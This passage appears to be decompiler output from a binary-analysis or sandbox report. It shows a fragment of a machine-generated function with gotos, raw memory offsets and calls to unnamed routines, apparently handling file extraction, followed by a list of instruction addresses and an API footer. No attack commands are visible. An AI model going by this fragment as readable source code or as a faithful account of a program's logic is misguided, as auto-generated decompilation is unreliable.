																															__eflags = 0;
																															L158:
																															 *(_t687 + 0x10f5) = _t482;
																															goto L163;
																														}
																														L142:
																														__eflags = _t481;
																														if(_t481 == 0) {
																															goto L157;
																														}
																														_t482 = 1;
																														goto L158;
																													}
																													__eflags = _t612;
																													if(_t612 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t706 - 0x14)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t706 - 0x41a8));
																												if( *((short*)(_t706 - 0x41a8)) == 0) {
																													goto L153;
																												}
																												_t267 = _t706 - 0x41a8; // -14760
																												_push(0x800);
																												_push(_t687 + 0x10f6);
																												__eflags = _t700 - 4;
																												if(__eflags != 0) {
																													_push(_t577 + 0x1e);
																													_t270 = _t706 - 0x2160; // -6496
																													_t481 = E00BA91C1(_t677, _t687, _t700, __eflags);
																												} else {
																													_t481 = E00BA7671(_t612, __eflags);
																												}
																												L151:
																												 *((char*)(_t706 - 0xf)) = _t481;
																												__eflags = _t481;
																												if(_t481 == 0) {
																													L139:
																													_t612 =  *((intOrPtr*)(_t706 - 0x10));
																													goto L140;
																												}
																												_t612 =  *((intOrPtr*)(_t706 - 0x10));
																												goto L154;
																											}
																											__eflags = _t700 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t700 - _t436;
																											if(_t700 == _t436) {
																												L144:
																												__eflags = _t612;
																												if(_t612 == 0) {
																													goto L153;
																												}
																												_push(_t687 + 0x10f6);
																												_t481 = E00BA78E0(_t677, _t687 + 0x10, _t577);
																												goto L151;
																											}
																											__eflags = _t700 - 2;
																											if(_t700 == 2) {
																												goto L144;
																											}
																											__eflags = _t700 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E00BA7032(__eflags, 0x47, _t577 + 0x1e, _t687 + 0x10f6);
																											__eflags = 0;
																											_t481 = 0;
																											 *((char*)(_t706 - 0xf)) = 0;
																											goto L139;
																										}
																										__eflags = _t434;
																										if(_t434 != 0) {
																											goto L131;
																										}
																										_t493 = 0x50;
																										__eflags =  *(_t706 - 0x18) - _t493;
																										if( *(_t706 - 0x18) == _t493) {
																											goto L131;
																										}
																										_t436 = 1;
																										_t612 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t577 + 0x6cc4);
																									if( *(_t577 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t702 =  *(_t577 + 0x32e4);
																									_t685 =  *(_t577 + 0x32e0);
																									__eflags = _t702;
																									if(__eflags < 0) {
																										L126:
																										_t700 = _t687 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t635 =  *(_t577 + 0x32d8);
																										_t636 = _t635 << 0xa;
																										__eflags = ( *(_t577 + 0x32dc) << 0x00000020 | _t635) << 0xa - _t702;
																										if(__eflags < 0) {
																											L125:
																											_t434 =  *(_t706 - 0xe);
																											_t612 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t702;
																											if(__eflags < 0) {
																												L124:
																												_t238 = _t706 - 0x2160; // -6496
																												E00BA9ABD(_t238,  *(_t577 + 0x32e0),  *(_t577 + 0x32e4));
																												 *(_t706 - 0x24) =  *(_t577 + 0x32e0);
																												 *(_t706 - 0x1c) =  *(_t577 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t501 = E00BA9885(_t685);
																												__eflags = _t685 -  *(_t577 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t501 -  *(_t577 + 0x32d8);
																												if(_t501 <=  *(_t577 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t685 - 0x5f5e100;
																											if(_t685 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t636 - _t685;
																										if(_t636 <= _t685) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t685 - 0xf4240;
																									if(_t685 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t199 = _t687 + 0xe4;
																								 *_t199 =  *(_t687 + 0xe4) + 1;
																								__eflags =  *_t199;
																								goto L110;
																							}
																							 *((char*)(_t706 - 0x11)) = 0;
																							_t503 = 0x50;
																							__eflags = _t700 - _t503;
																							if(_t700 != _t503) {
																								_t193 = _t706 - 0x2160; // -6496
																								__eflags = E00BA9929(_t193);
																								if(__eflags != 0) {
																									E00BA7032(__eflags, 0x3b, _t577 + 0x1e, _t687 + 0x10f6);
																									E00BA6FF6(0xbdff50, _t706, _t577 + 0x1e, _t687 + 0x10f6);
																								}
																							}
																							goto L109;
																						}
																						 *(_t687 + 0x10f5) = 1;
																						__eflags =  *((char*)(_t424 + 0x61f9));
																						if( *((char*)(_t424 + 0x61f9)) != 0) {
																							_t425 =  *(_t706 - 0xe);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t706 - 0xe) = 1;
																					 *(_t706 - 0xd) = 1;
																					_t183 = _t706 - 0x113c; // -2364
																					_t513 = L00BB12D1(_t605, _t183, 0, 0, 1);
																					__eflags = _t513;
																					if(_t513 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t706 - 0x1c) = 0;
																					L99:
																					_t185 = _t706 - 0x2160; // -6496
																					E00BA95E8(_t185, _t700);
																					_t395 =  *(_t706 - 0x1c);
																					goto L16;
																				}
																				_t175 = _t706 - 0x2160; // -6496
																				_push(_t577);
																				_t517 = E00BA80C2(_t687);
																				_t700 =  *(_t706 - 0x18);
																				_t605 = _t517;
																				 *(_t706 - 0xd) = _t605;
																				L93:
																				__eflags = _t605;
																				if(_t605 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t706 - 0xd);
																			if( *(_t706 - 0xd) != 0) {
																				_t518 =  *(_t706 - 0x18);
																				__eflags = _t518 - 0x50;
																				if(_t518 != 0x50) {
																					_t643 = 0x49;
																					__eflags = _t518 - _t643;
																					if(_t518 != _t643) {
																						_t644 = 0x45;
																						__eflags = _t518 - _t644;
																						if(_t518 != _t644) {
																							_t519 =  *(_t687 + 8);
																							__eflags =  *((intOrPtr*)(_t519 + 0x6158)) - 1;
																							if( *((intOrPtr*)(_t519 + 0x6158)) != 1) {
																								 *(_t687 + 0xe4) =  *(_t687 + 0xe4) + 1;
																								_t173 = _t706 - 0x113c; // -2364
																								_push(_t577);
																								E00BA7EFE(_t687);
																							}
																						}
																					}
																				}
																			}
																			goto L99;
																		}
																		__eflags = _t420 - 5;
																		if(_t420 == 5) {
																			goto L83;
																		}
																		_t605 =  *(_t706 - 0xd);
																		_t700 =  *(_t706 - 0x18);
																		__eflags = _t605;
																		if(_t605 == 0) {
																			goto L96;
																		}
																		__eflags = _t700 - _t674;
																		if(_t700 == _t674) {
																			goto L93;
																		}
																		_t522 =  *(_t687 + 8);
																		__eflags =  *((char*)(_t522 + 0x61f9));
																		if( *((char*)(_t522 + 0x61f9)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t706 - 0x11)) = 0;
																		_t525 = E00BAA0C0(_t687 + 0x10f6);
																		__eflags = _t525;
																		if(_t525 == 0) {
																			L81:
																			__eflags =  *((char*)(_t706 - 0x11));
																			if( *((char*)(_t706 - 0x11)) == 0) {
																				_t605 =  *(_t706 - 0xd);
																				goto L93;
																			}
																			L82:
																			_t605 = 0;
																			 *(_t706 - 0xd) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t706 - 0x11));
																		if( *((char*)(_t706 - 0x11)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t577 + 0x32c0);
																		_t161 = _t706 - 0x11; // 0x7ef
																		E00BA9314(0,  *(_t687 + 8), 0, _t687 + 0x10f6, 0x800, _t161,  *(_t577 + 0x32e0),  *(_t577 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t577 + 0x3341));
																	if( *((char*)(_t577 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t133 = _t706 - 0x28; // 0x7d8
																	_t533 = E00BBFC4A(_t577 + 0x3342, _t133, 8);
																	_t708 = _t710 + 0xc;
																	__eflags = _t533;
																	if(_t533 == 0) {
																		goto L73;
																	}
																	__eflags =  *(_t577 + 0x6cc4);
																	if( *(_t577 + 0x6cc4) != 0) {
																		goto L73;
																	}
																	__eflags =  *((char*)(_t687 + 0x10f4));
																	_t137 = _t706 - 0x113c; // -2364
																	_push(_t577 + 0x1e);
																	if(__eflags != 0) {
																		_push(6);
																		E00BA7032(__eflags);
																		E00BA6F5B(0xbdff50, 0xb);
																		__eflags = 0;
																		 *(_t706 - 0xd) = 0;
																		goto L73;
																	}
																	_push(0x7d);
																	E00BA7032(__eflags);
																	E00BAEA67( *(_t687 + 8) + 0x5024);
																	 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																	_t142 = _t706 - 0x13c; // 0x6c4
																	L00BAE9F4(_t142);
																}
															}
															E00BA6F5B(0xbdff50, 2);
															_t545 = E00BA1F0A(_t577);
															__eflags =  *((char*)(_t577 + 0x6cb4));
															_t395 = _t545 & 0xffffff00 |  *((char*)(_t577 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t101 = _t706 - 0x2198; // -6552
														_t547 = E00BA7D1E(_t101, _t577 + 0x32c0);
														__eflags = _t547;
														if(_t547 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t706 - 0x219c));
														if( *((char*)(_t706 - 0x219c)) == 0) {
															L59:
															 *(_t706 - 0xd) = 0;
															goto L61;
														}
														_t103 = _t706 - 0x2198; // -6552
														_t549 = E00BA7D00(_t103, _t687);
														__eflags = _t549;
														if(_t549 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t697 - _t672;
													if(_t697 != _t672) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t400 + 0x6154));
												if( *((char*)(_t400 + 0x6154)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t687 + 0x10f6);
											if( *(_t687 + 0x10f6) == 0) {
												goto L50;
											}
											 *(_t706 - 0xd) = 1;
											__eflags =  *(_t577 + 0x3318);
											if( *(_t577 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t697 - _t389;
										_t390 = 1;
										if(_t697 != _t389) {
											goto L46;
										}
										goto L45;
									}
									_t675 =  *((intOrPtr*)(_t577 + 0x6cb4));
									 *(_t706 - 0xe) = _t675;
									 *(_t706 - 0x24) = _t675;
									__eflags = _t675;
									if(_t675 == 0) {
										goto L214;
									} else {
										_t671 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t687 + 0xec) -  *((intOrPtr*)(_t580 + 0xa32c));
								if( *(_t687 + 0xec) <  *((intOrPtr*)(_t580 + 0xa32c))) {
									goto L29;
								}
								__eflags =  *((char*)(_t687 + 0xf1));
								if( *((char*)(_t687 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t577 + 0x32e0) = _t670;
								 *(_t577 + 0x32e4) = _t670;
								goto L26;
							}
							__eflags =  *(_t577 + 0x32e0) - _t670;
							if( *(_t577 + 0x32e0) >= _t670) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t577 + 0x32d8) = _t670;
							 *(_t577 + 0x32dc) = _t670;
							goto L22;
						}
						__eflags =  *(_t577 + 0x32d8) - _t670;
						if( *(_t577 + 0x32d8) >= _t670) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t694 - 3;
					if(_t694 != 3) {
						L10:
						__eflags = _t694 - 5;
						if(_t694 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t577 + 0x45ac));
						if( *((char*)(_t577 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t706 - 0x18));
						_push(0);
						_push(_t687 + 0x10);
						_push(_t577);
						_t566 = E00BB842D(_t670);
						__eflags = _t566;
						if(_t566 != 0) {
							__eflags = 0;
							 *0xbd2260( *((intOrPtr*)(_t577 + 0x6ca0)),  *((intOrPtr*)(_t577 + 0x6ca4)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t577 + 0x10))))();
							goto L15;
						} else {
							E00BA6F5B(0xbdff50, 1);
							goto L219;
						}
					}
					__eflags =  *(_t687 + 0x10f5);
					if( *(_t687 + 0x10f5) == 0) {
						goto L217;
					} else {
						E00BA7B3F(_t577, _t706,  *(_t687 + 8), _t577, _t687 + 0x10f6);
						goto L10;
					}
				}
				if( *((intOrPtr*)(_t687 + 0x5f)) == 0) {
					L4:
					_t395 = 0;
					goto L17;
				}
				_push(_t371);
				_push(0);
				_push(_t687 + 0x10);
				_push(_t577);
				if(E00BB842D(0) != 0) {
					_t670 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E00BA6F5B(0xbdff50, 1);
					goto L4;
				}
			}

0x00ba8525
0x00ba852a
0x00ba8534
0x00ba853a
0x00ba853d
0x00ba8540
0x00ba8542
0x00ba8548
0x00ba854f
0x00ba8555
0x00ba8581
0x00ba8582
0x00ba8588
0x00ba858b
0x00ba8624
0x00ba862a
0x00ba8630
0x00ba8648
0x00ba8648
0x00ba864e
0x00ba8666
0x00ba8666
0x00ba8669
0x00ba866f
0x00ba868c
0x00ba8691
0x00ba8695
0x00ba869f
0x00ba86aa
0x00ba86af
0x00ba86b1
0x00ba86b4
0x00ba86b7
0x00ba86b9
0x00ba86bb
0x00ba86bf
0x00ba86c1
0x00ba86c3
0x00ba86c3
0x00ba86bf
0x00ba86cb
0x00ba86d0
0x00ba86d1
0x00ba86de
0x00ba86df
0x00ba86e7
0x00ba86ee
0x00ba86f1
0x00ba8748
0x00ba874d
0x00ba874f
0x00ba8751
0x00ba8757
0x00ba875d
0x00ba8761
0x00ba8761
0x00ba8761
0x00ba8761
0x00ba86f3
0x00ba86f6
0x00ba86fc
0x00ba86fe
0x00ba8700
0x00ba8704
0x00ba8706
0x00ba870d
0x00ba8712
0x00ba8713
0x00ba871a
0x00ba871f
0x00ba8729
0x00ba872b
0x00ba8741
0x00ba872d
0x00ba872f
0x00ba8736
0x00ba8738
0x00ba8738
0x00ba872b
0x00ba8704
0x00ba86fe
0x00ba876a
0x00ba876f
0x00ba8787
0x00ba8792
0x00ba879a
0x00ba879d
0x00ba879f
0x00ba87a3
0x00ba87a6
0x00ba87a9
0x00ba87ac
0x00ba87c4
0x00ba87c7
0x00ba87cc
0x00ba87d2
0x00ba87d3
0x00ba87d5
0x00ba87de
0x00ba87de
0x00ba87e0
0x00ba87e3
0x00ba87ed
0x00ba87f4
0x00ba87f9
0x00ba87fb
0x00ba91ba
0x00ba91ba
0x00ba8611
0x00ba8612
0x00ba8617
0x00ba8621
0x00ba8621
0x00ba8801
0x00ba880f
0x00ba8812
0x00ba881a
0x00ba8821
0x00ba8824
0x00ba883b
0x00ba883b
0x00ba883e
0x00ba883e
0x00ba8843
0x00ba8846
0x00ba884d
0x00ba884e
0x00ba8851
0x00ba8854
0x00ba885f
0x00ba885f
0x00ba8862
0x00ba8869
0x00ba8869
0x00ba886f
0x00ba8876
0x00ba8877
0x00ba8885
0x00ba888a
0x00ba888c
0x00ba88c4
0x00ba88c7
0x00ba88d3
0x00ba88d3
0x00ba88d3
0x00ba88d6
0x00ba88d6
0x00ba88e0
0x00ba88e5
0x00ba88e7
0x00ba890b
0x00ba890b
0x00ba8912
0x00000000
0x00000000
0x00ba8914
0x00ba891e
0x00ba8923
0x00ba8925
0x00ba8a04
0x00000000
0x00ba8a04
0x00ba892b
0x00ba892e
0x00ba8936
0x00ba893c
0x00ba893d
0x00ba893d
0x00ba893f
0x00ba8948
0x00ba894b
0x00ba8957
0x00ba896a
0x00ba8974
0x00ba8986
0x00ba898b
0x00ba8992
0x00ba8a28
0x00ba8a28
0x00ba8a2c
0x00ba8a32
0x00ba8a37
0x00ba8a3d
0x00ba8a42
0x00ba8a48
0x00ba8a4f
0x00ba8a54
0x00ba8a55
0x00ba8a57
0x00ba8aea
0x00ba8aec
0x00ba8af1
0x00ba8af3
0x00ba8b45
0x00ba8b48
0x00ba8b4a
0x00ba8b6e
0x00ba8b71
0x00ba8b71
0x00ba8b78
0x00ba8bb0
0x00ba8bb2
0x00ba916f
0x00ba916f
0x00ba9173
0x00ba9179
0x00ba917e
0x00ba9182
0x00ba9185
0x00ba9188
0x00ba918a
0x00ba918a
0x00ba918a
0x00ba918a
0x00ba9190
0x00ba9190
0x00ba9194
0x00000000
0x00000000
0x00ba9196
0x00ba9198
0x00ba860f
0x00ba860f
0x00000000
0x00ba860f
0x00ba919e
0x00ba91a4
0x00ba91b2
0x00ba91b4
0x00000000
0x00000000
0x00000000
0x00ba91b4
0x00ba91a6
0x00ba91a8
0x00000000
0x00ba91a8
0x00ba8bb8
0x00ba8bb8
0x00ba8bbb
0x00ba8bc2
0x00ba8bd4
0x00ba8bd4
0x00ba8bd7
0x00ba8bd9
0x00ba8c20
0x00ba8c20
0x00ba8c24
0x00ba8c26
0x00ba8c2e
0x00ba8c2e
0x00ba8c42
0x00ba8c48
0x00ba8c4e
0x00ba8c54
0x00ba8c65
0x00ba8c7b
0x00ba8c86
0x00ba8c8f
0x00ba8c92
0x00ba8c99
0x00ba8c9f
0x00ba8ca4
0x00ba8ca7
0x00ba8ca9
0x00ba8cac
0x00ba8caf
0x00ba8cb2
0x00ba8cb5
0x00ba8cb8
0x00ba8cba
0x00ba8d5d
0x00ba8d5d
0x00ba8d60
0x00ba8d67
0x00ba8d6e
0x00ba8d72
0x00ba8d88
0x00ba8d8a
0x00ba8d8a
0x00ba8d8b
0x00ba8d8b
0x00ba8d8f
0x00ba8d92
0x00ba8d95
0x00ba8d98
0x00ba8ea4
0x00ba8eab
0x00ba8ead
0x00ba8eb4
0x00ba8ede
0x00ba8ee3
0x00ba8ef5
0x00ba8efb
0x00ba8efd
0x00ba8f03
0x00ba8f1d
0x00ba8eb6
0x00ba8eb6
0x00ba8ebc
0x00ba8ec2
0x00ba8ec3
0x00ba8ec3
0x00ba8eb4
0x00ba8f22
0x00ba8f24
0x00ba8f29
0x00ba8f30
0x00ba8f62
0x00ba8f62
0x00ba8f62
0x00ba8f64
0x00ba8f66
0x00ba8f66
0x00ba8f6d
0x00ba8f77
0x00ba8f7e
0x00ba8f9d
0x00ba8f9d
0x00ba8fa1
0x00ba8fa4
0x00ba9005
0x00ba9005
0x00ba9009
0x00ba900c
0x00ba901f
0x00ba901f
0x00ba901f
0x00ba9021
0x00ba9021
0x00ba9025
0x00000000
0x00000000
0x00ba902b
0x00ba902e
0x00ba9032
0x00ba903e
0x00ba903e
0x00ba9042
0x00ba905d
0x00ba905d
0x00ba905f
0x00ba9074
0x00ba9074
0x00ba9076
0x00ba913a
0x00ba913a
0x00ba913d
0x00ba9144
0x00ba914c
0x00ba9153
0x00ba9158
0x00ba915a
0x00ba9163
0x00ba9163
0x00ba915a
0x00ba9168
0x00000000
0x00ba9168
0x00ba907c
0x00ba9081
0x00ba9083
0x00ba9086
0x00ba908c
0x00ba908c
0x00ba908e
0x00ba90a0
0x00ba90a0
0x00ba90a6
0x00ba90ab
0x00ba90ae
0x00ba90b4
0x00ba90c8
0x00ba90cf
0x00ba90e2
0x00ba90e4
0x00ba90ed
0x00ba90f2
0x00ba90f8
0x00ba9107
0x00ba911a
0x00ba912d
0x00ba912f
0x00ba9132
0x00ba9137
0x00000000
0x00ba9137
0x00ba9090
0x00ba9096
0x00000000
0x00000000
0x00ba9098
0x00ba909e
0x00000000
0x00000000
0x00000000
0x00ba909e
0x00ba9088
0x00ba908a
0x00000000
0x00000000
0x00000000
0x00ba908a
0x00ba9061
0x00ba9064
0x00ba906b
0x00000000
0x00000000
0x00ba9071
0x00000000
0x00ba9071
0x00ba9044
0x00ba9046
0x00000000
0x00000000
0x00ba9048
0x00ba904f
0x00000000
0x00000000
0x00ba9055
0x00ba9057
0x00000000
0x00000000
0x00000000
0x00ba9057
0x00ba9034
0x00ba9038
0x00000000
0x00000000
0x00000000
0x00ba9038
0x00ba900e
0x00ba9015
0x00000000
0x00000000
0x00ba9017
0x00ba9019
0x00000000
0x00000000
0x00ba901b
0x00000000
0x00ba901b
0x00ba8fa6
0x00ba8faa
0x00000000
0x00000000
0x00ba8fac
0x00ba8fae
0x00000000
0x00000000
0x00ba8fb0
0x00ba8fb6
0x00ba8fe0
0x00ba8fe0
0x00ba8fea
0x00ba8feb
0x00ba8fed
0x00ba8fed
0x00ba8ff9
0x00ba8ffd
0x00ba9002
0x00000000
0x00ba9002
0x00ba8fb8
0x00ba8fbe
0x00ba8fc8
0x00ba8fc8
0x00ba8fcf
0x00000000
0x00000000
0x00ba8fd1
0x00ba8fdb
0x00ba8fdc
0x00000000
0x00ba8fdc
0x00ba8fc0
0x00ba8fc6
0x00000000
0x00000000
0x00000000
0x00ba8fc6
0x00ba8f80
0x00ba8f86
0x00000000
0x00000000
0x00ba8f88
0x00ba8f92
0x00ba8f92
0x00ba8f94
0x00ba8f96
0x00ba8f96
0x00000000
0x00ba8f94
0x00ba8f8a
0x00ba8f90
0x00000000
0x00000000
0x00000000
0x00ba8f90
0x00ba8f6f
0x00000000
0x00ba8f6f
0x00ba8f47
0x00ba8f53
0x00ba8f58
0x00ba8f5a
0x00000000
0x00000000
0x00ba8f5c
0x00ba8f5e
0x00000000
0x00ba8f5e
0x00ba8d9e
0x00ba8da4
0x00ba8da7
0x00ba8e10
0x00ba8e10
0x00ba8e15
0x00ba8e26
0x00ba8e2b
0x00ba8e2e
0x00ba8e30
0x00ba8e7d
0x00ba8e7d
0x00ba8e80
0x00ba8e80
0x00ba8e87
0x00ba8ddc
0x00ba8ddc
0x00ba8dde
0x00ba8e9a
0x00ba8e9a
0x00ba8e9a
0x00ba8e9c
0x00ba8e9c
0x00000000
0x00ba8e9c
0x00ba8de4
0x00ba8de4
0x00ba8de6
0x00000000
0x00000000
0x00ba8dee
0x00000000
0x00ba8dee
0x00ba8e8d
0x00ba8e8f
0x00000000
0x00000000
0x00ba8dd8
0x00ba8dd8
0x00000000
0x00ba8dd8
0x00ba8e32
0x00ba8e3a
0x00000000
0x00000000
0x00ba8e3c
0x00ba8e42
0x00ba8e4e
0x00ba8e4f
0x00ba8e52
0x00ba8e60
0x00ba8e61
0x00ba8e68
0x00ba8e54
0x00ba8e54
0x00ba8e54
0x00ba8e6d
0x00ba8e6d
0x00ba8e70
0x00ba8e72
0x00ba8dd5
0x00ba8dd5
0x00000000
0x00ba8dd5
0x00ba8e78
0x00000000
0x00ba8e78
0x00ba8da9
0x00ba8dac
0x00000000
0x00000000
0x00ba8dae
0x00ba8db0
0x00ba8df4
0x00ba8df4
0x00ba8df6
0x00000000
0x00000000
0x00ba8e02
0x00ba8e09
0x00000000
0x00ba8e09
0x00ba8db2
0x00ba8db5
0x00000000
0x00000000
0x00ba8db7
0x00ba8dba
0x00000000
0x00000000
0x00ba8dc9
0x00ba8dce
0x00ba8dd0
0x00ba8dd2
0x00000000
0x00ba8dd2
0x00ba8d74
0x00ba8d76
0x00000000
0x00000000
0x00ba8d7a
0x00ba8d7b
0x00ba8d7f
0x00000000
0x00000000
0x00ba8d83
0x00ba8d84
0x00000000
0x00ba8d84
0x00ba8cc0
0x00ba8cc6
0x00000000
0x00000000
0x00ba8ccc
0x00ba8cd2
0x00ba8cd8
0x00ba8cda
0x00ba8d5a
0x00ba8d5a
0x00000000
0x00ba8d5a
0x00ba8cdc
0x00ba8ce6
0x00ba8ce6
0x00ba8cf6
0x00ba8cf9
0x00ba8cfb
0x00ba8d55
0x00ba8d55
0x00ba8d58
0x00ba8d58
0x00000000
0x00ba8d58
0x00ba8cfd
0x00ba8d03
0x00ba8d05
0x00ba8d07
0x00ba8d2c
0x00ba8d32
0x00ba8d3e
0x00ba8d49
0x00ba8d52
0x00000000
0x00ba8d52
0x00ba8d09
0x00ba8d13
0x00ba8d15
0x00ba8d1a
0x00ba8d20
0x00000000
0x00000000
0x00ba8d22
0x00000000
0x00000000
0x00ba8d24
0x00ba8d2a
0x00000000
0x00000000
0x00000000
0x00ba8d2a
0x00ba8d0b
0x00ba8d11
0x00000000
0x00000000
0x00000000
0x00ba8d11
0x00ba8cff
0x00ba8d01
0x00000000
0x00000000
0x00000000
0x00ba8d01
0x00ba8cde
0x00ba8ce4
0x00000000
0x00000000
0x00000000
0x00ba8ce4
0x00ba8c28
0x00ba8c28
0x00ba8c28
0x00ba8c28
0x00000000
0x00ba8c28
0x00ba8bdf
0x00ba8be2
0x00ba8be3
0x00ba8be6
0x00ba8be8
0x00ba8bf3
0x00ba8bf5
0x00ba8c04
0x00ba8c16
0x00ba8c16
0x00ba8bf5
0x00000000
0x00ba8be6
0x00ba8bc4
0x00ba8bcb
0x00ba8bd2
0x00ba8c1d
0x00000000
0x00ba8c1d
0x00000000
0x00ba8bd2
0x00ba8b7e
0x00ba8b81
0x00ba8b88
0x00ba8b8f
0x00ba8b94
0x00ba8b96
0x00000000
0x00000000
0x00ba8b98
0x00ba8b9a
0x00ba8b9d
0x00ba8b9d
0x00ba8ba3
0x00ba8ba8
0x00000000
0x00ba8ba8
0x00ba8b4c
0x00ba8b55
0x00ba8b56
0x00ba8b5b
0x00ba8b5e
0x00ba8b60
0x00ba8b68
0x00ba8b68
0x00ba8b6a
0x00000000
0x00000000
0x00000000
0x00ba8b6c
0x00ba8af5
0x00ba8af9
0x00ba8aff
0x00ba8b02
0x00ba8b06
0x00ba8b0e
0x00ba8b0f
0x00ba8b12
0x00ba8b1a
0x00ba8b1b
0x00ba8b1e
0x00ba8b20
0x00ba8b26
0x00ba8b2c
0x00ba8b2e
0x00ba8b34
0x00ba8b3b
0x00ba8b3e
0x00ba8b3e
0x00ba8b2c
0x00ba8b1e
0x00ba8b12
0x00ba8b06
0x00000000
0x00ba8af9
0x00ba8a5d
0x00ba8a60
0x00000000
0x00000000
0x00ba8a66
0x00ba8a69
0x00ba8a6c
0x00ba8a6e
0x00000000
0x00000000
0x00ba8a74
0x00ba8a77
0x00000000
0x00000000
0x00ba8a7d
0x00ba8a80
0x00ba8a87
0x00000000
0x00000000
0x00ba8a8f
0x00ba8a99
0x00ba8a9e
0x00ba8aa0
0x00ba8ad7
0x00ba8ad7
0x00ba8adb
0x00ba8b65
0x00000000
0x00ba8b65
0x00ba8ae1
0x00ba8ae3
0x00ba8ae5
0x00000000
0x00ba8ae5
0x00ba8aa2
0x00ba8aa6
0x00000000
0x00000000
0x00ba8aa8
0x00ba8ab0
0x00ba8ab1
0x00ba8ab8
0x00ba8ad2
0x00000000
0x00ba8ad2
0x00ba8998
0x00ba899f
0x00000000
0x00000000
0x00ba89a7
0x00ba89b2
0x00ba89b7
0x00ba89ba
0x00ba89bc
0x00000000
0x00000000
0x00ba89be
0x00ba89c5
0x00000000
0x00000000
0x00ba89c7
0x00ba89ce
0x00ba89d8
0x00ba89d9
0x00ba8a10
0x00ba8a12
0x00ba8a1e
0x00ba8a23
0x00ba8a25
0x00000000
0x00ba8a25
0x00ba89db
0x00ba89dd
0x00ba89eb
0x00ba89f0
0x00ba89f4
0x00ba89fa
0x00ba89fa
0x00ba890b
0x00ba88f0
0x00ba88f7
0x00ba88fc
0x00ba8903
0x00000000
0x00ba8903
0x00ba8895
0x00ba889b
0x00ba88a0
0x00ba88a2
0x00000000
0x00000000
0x00ba88a4
0x00ba88ab
0x00ba88bd
0x00ba88bf
0x00000000
0x00ba88bf
0x00ba88ae
0x00ba88b4
0x00ba88b9
0x00ba88bb
0x00000000
0x00000000
0x00000000
0x00ba88bb
0x00ba8864
0x00ba8867
0x00000000
0x00000000
0x00000000
0x00ba8867
0x00ba8856
0x00ba885d
0x00000000
0x00000000
0x00000000
0x00ba885d
0x00ba8826
0x00ba882d
0x00000000
0x00000000
0x00ba882f
0x00ba8833
0x00ba8839
0x00000000
0x00000000
0x00000000
0x00ba8839
0x00ba87d7
0x00ba87da
0x00ba87dc
0x00000000
0x00000000
0x00000000
0x00ba87dc
0x00ba87ae
0x00ba87b4
0x00ba87b7
0x00ba87ba
0x00ba87bc
0x00000000
0x00ba87c2
0x00ba87c2
0x00ba87c2
0x00000000
0x00ba87c2
0x00ba87bc
0x00ba8677
0x00ba867d
0x00000000
0x00000000
0x00ba867f
0x00ba8686
0x00000000
0x00000000
0x00000000
0x00ba8686
0x00ba8650
0x00ba865a
0x00ba865a
0x00ba8660
0x00000000
0x00ba8660
0x00ba8652
0x00ba8658
0x00000000
0x00000000
0x00000000
0x00ba8658
0x00ba8632
0x00ba863c
0x00ba863c
0x00ba8642
0x00000000
0x00ba8642
0x00ba8634
0x00ba863a
0x00000000
0x00000000
0x00000000
0x00ba863a
0x00ba8591
0x00ba8594
0x00ba85b3
0x00ba85b3
0x00ba85b6
0x00000000
0x00000000
0x00ba85bc
0x00ba85c3
0x00000000
0x00000000
0x00ba85ce
0x00ba85cf
0x00ba85d3
0x00ba85d4
0x00ba85d5
0x00ba85da
0x00ba85dc
0x00ba85f1
0x00ba8605
0x00ba860d
0x00000000
0x00ba85de
0x00ba85e5
0x00000000
0x00ba85e5
0x00ba85dc
0x00ba8596
0x00ba859d
0x00000000
0x00ba85a3
0x00ba85ae
0x00000000
0x00ba85ae
0x00ba859d
0x00ba855a
0x00ba8578
0x00ba8578
0x00000000
0x00ba8578
0x00ba855c
0x00ba855d
0x00ba8561
0x00ba8562
0x00ba856a
0x00ba857f
0x00ba857f
0x00000000
0x00ba856c
0x00ba8573
0x00000000
0x00ba8573

APIs

__EH_prolog.LIBCMT ref: 00BA852A
_memcmp.LIBVCRUNTIME ref: 00BA89B2

Memory Dump Source

